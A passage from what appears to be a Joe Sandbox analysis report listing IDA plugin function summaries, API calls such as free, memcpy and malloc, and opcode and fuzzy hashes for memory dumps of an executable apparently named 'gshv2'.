                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                              • String ID:
                              • API String ID: 1775671525-0
                              • Opcode ID: 50caa6e3a6a8c2f5aea7cf1210afe2062a3a86f6e0826d80f4304e2a235ea8f1
                              • Instruction ID: e2b07c06988df8b606aad9692ae6bfb12f33f4027e44f96963bc5a2191a48f9e
                              • Opcode Fuzzy Hash: 50caa6e3a6a8c2f5aea7cf1210afe2062a3a86f6e0826d80f4304e2a235ea8f1
                              • Instruction Fuzzy Hash: 4A41C362B0978185EE149B12ED042AAA355EB48FF4F580631DFAD8B7C5DF7EE2418312
                              APIs
                                • Part of subcall function 00007FF62C0BAE10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF62C0A1A2E), ref: 00007FF62C0BAE48
                                • Part of subcall function 00007FF62C0BAE10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF62C0A1A2E), ref: 00007FF62C0BAE77
                                • Part of subcall function 00007FF62C0BAE10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF62C0A1A2E), ref: 00007FF62C0BAEA6
                                • Part of subcall function 00007FF62C0BAE10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF62C0A1A2E), ref: 00007FF62C0BAEE1
                                • Part of subcall function 00007FF62C0BAE10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF62C0A1A2E), ref: 00007FF62C0BAF10
                                • Part of subcall function 00007FF62C0BAE10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF62C0A1A2E), ref: 00007FF62C0BAF45
                              • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A1A54
                              • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A1A7F
                              • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A1AA7
                              • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A1ACF
                              • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A1AF7
                              • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A1B1F
                              • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A1B47
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: d836042abe27d54f972e489ca4f21c46eaf870b1b349e4f613281d5c0da16db2
                              • Instruction ID: f08055be8da6867008db8ffccbe1670246ebab6e22bb3692c0b6e7d932034228
                              • Opcode Fuzzy Hash: d836042abe27d54f972e489ca4f21c46eaf870b1b349e4f613281d5c0da16db2
                              • Instruction Fuzzy Hash: A731F761B5BB1680FE559F61DC806782360FF85FA0F58A436CE0C873A5CF2EE9409253
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: memset$free$malloc
                              • String ID: ##Overlay
                              • API String ID: 1393892039-3248624929
                              • Opcode ID: 9dd30a4d501a35a45c045f94b2b6f92fb818b1d5ac0612a8ce2ede0dd92a826a
                              • Instruction ID: 5db7cf3967bca2b0a7581b7e26e3b287b53d7ead32451b5b0c6335c2d47c2bd2
                              • Opcode Fuzzy Hash: 9dd30a4d501a35a45c045f94b2b6f92fb818b1d5ac0612a8ce2ede0dd92a826a
                              • Instruction Fuzzy Hash: F432C273105BC186D3109F29A8441CA37E8F745F68F284B39EEA40BB98DF3585A1E779
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: free$floorf
                              • String ID:
                              • API String ID: 2402160083-0
                              • Opcode ID: 8447988f2d2875be732f2f4e82d0f1f8e8f85b208db9797200ea177815ed5302
                              • Instruction ID: f6faf4784f4f8464dcce02143e5c63b1d0ac8a0024a6bd5036e2ac476b78803c
                              • Opcode Fuzzy Hash: 8447988f2d2875be732f2f4e82d0f1f8e8f85b208db9797200ea177815ed5302
                              • Instruction Fuzzy Hash: 7D716132A18BC586DA21CF26A8403EAB3A4FF9D790F144236EF8C53765DF39E551CA01
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: malloc$memcpy$free
                              • String ID:
                              • API String ID: 2877244841-0
                              • Opcode ID: 41962eec364636121f420d1a6d4b789836b7c491c0d4585868936a7d201724ca
                              • Instruction ID: 1b40f12c619c8b8706f12c077c64db9d509e9e87def99af2a52ea228b084d58a
                              • Opcode Fuzzy Hash: 41962eec364636121f420d1a6d4b789836b7c491c0d4585868936a7d201724ca
                              • Instruction Fuzzy Hash: AA618E72A09B8186EF44CF25D9803B8A3A4FB48B54F18A235CF8D87356EF39E591C341
                              APIs
                              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FF62C0A14BD), ref: 00007FF62C0CF575
                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00007FF62C0A14BD), ref: 00007FF62C0CF587
                              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FF62C0A14BD), ref: 00007FF62C0CF5C6
                              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FF62C0A14BD), ref: 00007FF62C0CF5DF
                              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FF62C0A14BD), ref: 00007FF62C0CF604
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: memcpy$_invalid_parameter_noinfo_noreturn
                              • String ID:
                              • API String ID: 2665656946-0
                              • Opcode ID: e0e760df61f22dcbcc095a072f92cc21ecaa7102169e5a0241f88aba0943b92c
                              • Instruction ID: 9b169b1074d6eff334a6a23e70bdd91998d4e9a7128231b2cd44a8c36cae3847
                              • Opcode Fuzzy Hash: e0e760df61f22dcbcc095a072f92cc21ecaa7102169e5a0241f88aba0943b92c
                              • Instruction Fuzzy Hash: 1041D6B1B14B9641EE04DB12ED042A867A1FB48BD0F548532DE5D87B99EF3EE292C301
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: Context$CompositionReleaseWindow
                              • String ID:
                              • API String ID: 244372355-3916222277
                              • Opcode ID: f0608f4d2f5933758a6dba6cc5a7e80ddc8d2399835f5879a227162c55a92b4e
                              • Instruction ID: 4c85c748c4bb24b1d681407358b3bf360bcfe92ffb8bc2a2b0f4287ee20f597c
                              • Opcode Fuzzy Hash: f0608f4d2f5933758a6dba6cc5a7e80ddc8d2399835f5879a227162c55a92b4e
                              • Instruction Fuzzy Hash: B0017C32A08B4182EE208B06AD14269B7A1FB8CBA0F084135DE8D83755EF3DE8458B01
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: __current_exception__current_exception_contextterminate
                              • String ID: csm
                              • API String ID: 2542180945-1018135373
                              • Opcode ID: 13a3738c5717a9776ea31623ac55d36df50be0d8933bcdc5182b4c2b4034302b
                              • Instruction ID: 1ffb20a8cbc01baa8751fadc96d538afc456d9d191be819b3797d0ed85c1fa4d
                              • Opcode Fuzzy Hash: 13a3738c5717a9776ea31623ac55d36df50be0d8933bcdc5182b4c2b4034302b
                              • Instruction Fuzzy Hash: D0F0E237609B45CACB149F21EC808AC3368F788BACB5A5120FA8D87B55CF39D8908381
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: memchr
                              • String ID: ...
                              • API String ID: 3297308162-440645147
                              • Opcode ID: 3dae8871612b2a89ec93fbdb0c08a60a2257346372f36b2541edb1c00f37e8f3
                              • Instruction ID: 7a0f201a6d83a7bf7317b667d81ed55ff839d5e8f30f5eb47c599ab4393598dd
                              • Opcode Fuzzy Hash: 3dae8871612b2a89ec93fbdb0c08a60a2257346372f36b2541edb1c00f37e8f3
                              • Instruction Fuzzy Hash: 0012F732D187C985EB528B3694013F9B350EF6D7A4F189731EE5C726E1EF6AA2C18701
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: mallocmemcpy$free
                              • String ID:
                              • API String ID: 798594229-0
                              • Opcode ID: b8b578794c7d36ea2b17c3b35c4d525053bef2f43740608f7bc378a7882012d3
                              • Instruction ID: 2560fbd62d1397820539100a19491fcc6d4c12b53847110724ecd2131c6a23c2
                              • Opcode Fuzzy Hash: b8b578794c7d36ea2b17c3b35c4d525053bef2f43740608f7bc378a7882012d3
                              • Instruction Fuzzy Hash: 97416E72A09B8286EF50CF2598401A963B1FF88BA4F185136DF5DC7789DF39E941C712
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 646be602e9afab55660837a51764879d3b31e86ed7a86cc8f653ddaadadcf76d
                              • Instruction ID: 5a3b2d07b87b06c22cbf61c9873f1cf4d8eb4ff9d75b5721a7b31763889119a0
                              • Opcode Fuzzy Hash: 646be602e9afab55660837a51764879d3b31e86ed7a86cc8f653ddaadadcf76d
                              • Instruction Fuzzy Hash: B0413232A0AB4682EF14CF15DC8017973A0FF84FA0B589536DA1C87799CF3AE9418392
                              APIs
                                • Part of subcall function 00007FF62C0BDF40: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0B2742,?,?,?,00007FF62C0A67AC), ref: 00007FF62C0BDF9D
                                • Part of subcall function 00007FF62C0BDF40: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0B2742,?,?,?,00007FF62C0A67AC), ref: 00007FF62C0BE040
                                • Part of subcall function 00007FF62C0BDF40: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0B2742,?,?,?,00007FF62C0A67AC), ref: 00007FF62C0BE06F
                                • Part of subcall function 00007FF62C0BE0A0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0B274A,?,?,?,00007FF62C0A67AC), ref: 00007FF62C0BE0CB
                                • Part of subcall function 00007FF62C0BE0A0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0B274A,?,?,?,00007FF62C0A67AC), ref: 00007FF62C0BE0F2
                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0A67AC), ref: 00007FF62C0B2784
                              • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B27BE
                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0A67AC), ref: 00007FF62C0B27ED
                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0A67AC), ref: 00007FF62C0B2815
                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0A67AC), ref: 00007FF62C0B283D
                                • Part of subcall function 00007FF62C0C01E0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0B2768,?,?,?,00007FF62C0A67AC), ref: 00007FF62C0C0211
                                • Part of subcall function 00007FF62C0C01E0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0B2768,?,?,?,00007FF62C0A67AC), ref: 00007FF62C0C0239
                                • Part of subcall function 00007FF62C0C01E0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0B2768,?,?,?,00007FF62C0A67AC), ref: 00007FF62C0C0261
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: a0b8fa40c367be0cf4d550eb261d47adfa5e76108d3e1fc670166add5441dcf8
                              • Instruction ID: 165a7f08878da1c48c6be02526f74cf450173c50f5b2254799bae07d027ad974
                              • Opcode Fuzzy Hash: a0b8fa40c367be0cf4d550eb261d47adfa5e76108d3e1fc670166add5441dcf8
                              • Instruction Fuzzy Hash: 82311525A4AB5681EE54DF26D84037A2360FF89FA0F186036DE0D87799CF3EE6418357
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 6228c0cfdfe3ab49fe997581f9682be4996bc7aeb1284bb124064aeaf8cfc7f5
                              • Instruction ID: 8cceed17b88c63174044878431b925ea9b593565cd476c8cc802f8611835a1b3
                              • Opcode Fuzzy Hash: 6228c0cfdfe3ab49fe997581f9682be4996bc7aeb1284bb124064aeaf8cfc7f5
                              • Instruction Fuzzy Hash: 6E312921A1B74685FE958B25DC402B82360FF89FA0F586536CE0D973A9CF2EE9408313
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 2b164cdf6d23274124befa53a59eee3137ed5b334b6df2f071558036e7f35e91
                              • Instruction ID: 4ca46c5bbd34ceb1abdd68c27a79d9cdc0ec23224a7c00e9d5e94296918f1fbb
                              • Opcode Fuzzy Hash: 2b164cdf6d23274124befa53a59eee3137ed5b334b6df2f071558036e7f35e91
                              • Instruction Fuzzy Hash: 60210E64B5B74681FE558BA1DC4037D2260FF85FA0F58A436CE0D87795CF2EE6418613
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: ceilffloorf
                              • String ID:
                              • API String ID: 300201839-0
                              • Opcode ID: 07f66ec4dab02e98ce517c4298ca87a1a4658cb6173b60d4227201da63bce10f
                              • Instruction ID: f78778885a7b4035264e9d994a13c416671ce8b9ee1f7d3d583c260c04d5bb56
                              • Opcode Fuzzy Hash: 07f66ec4dab02e98ce517c4298ca87a1a4658cb6173b60d4227201da63bce10f
                              • Instruction Fuzzy Hash: CD51EA23618BD485D762DF3594403ADB7A4EFA9751F498336EA8CA3355DF39E880CB10
                              APIs
                              • memcpy.VCRUNTIME140(?,?,?,00007FF62C0A101D), ref: 00007FF62C0CEA67
                              • memcpy.VCRUNTIME140(?,?,?,00007FF62C0A101D), ref: 00007FF62C0CEB23
                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF62C0A101D), ref: 00007FF62C0CEB7E
                              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF62C0CEB8B
                                • Part of subcall function 00007FF62C0CFC70: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0CEAE6,?,?,?,00007FF62C0A101D), ref: 00007FF62C0CFC8A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                              • String ID:
                              • API String ID: 1155477157-0
                              • Opcode ID: 87a7451410f5fb63623433a971c407ef3b6f3f88013bee35b0aadba9137e9e77
                              • Instruction ID: e8326f78832a6c2f753399b207d15f6c841ae434d5b88777147f1f10bdbdfc00
                              • Opcode Fuzzy Hash: 87a7451410f5fb63623433a971c407ef3b6f3f88013bee35b0aadba9137e9e77
                              • Instruction Fuzzy Hash: 31311222B09AC288FE149B11D95437E2251EB45FF4F540631DA3E87BC5DF3EE6808352
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: __acrt_iob_funcfclosefflushfree
                              • String ID:
                              • API String ID: 4015754604-0
                              • Opcode ID: 79fb6fafe272ffb90f3c222bc48b96549a04a781a1814ccba7638e812087eed5
                              • Instruction ID: 8829e90ce55c7ddf70075ba7df96f43828ccf48968bec9791e8c2e8379b6bff4
                              • Opcode Fuzzy Hash: 79fb6fafe272ffb90f3c222bc48b96549a04a781a1814ccba7638e812087eed5
                              • Instruction Fuzzy Hash: FA417C72A09B8285EF14CF21E8802BD73A0FB85B94F494436DF5C87659DF3EE4909712
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: Window$LongMoveRectexit
                              • String ID:
                              • API String ID: 2994184003-0
                              • Opcode ID: bb1b18cb9d7b8e4d22c257bbf5248be40e4a71518151bf2fc581d29680595bda
                              • Instruction ID: 0b78f3873096a744e5ce51f364fbf1e5a2dc58d253906d4267bd755ee0d3ab7b
                              • Opcode Fuzzy Hash: bb1b18cb9d7b8e4d22c257bbf5248be40e4a71518151bf2fc581d29680595bda
                              • Instruction Fuzzy Hash: FB21B374E186828AFF148F29AD446243BA0FB58760F448679D92DC2764DF3EB584CA12
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: freemalloc
                              • String ID:
                              • API String ID: 3061335427-0
                              • Opcode ID: ec3e9623ea8803e7c10f5c9c5fd16f31160b46dcd3912112c4944d8f7bc9fb38
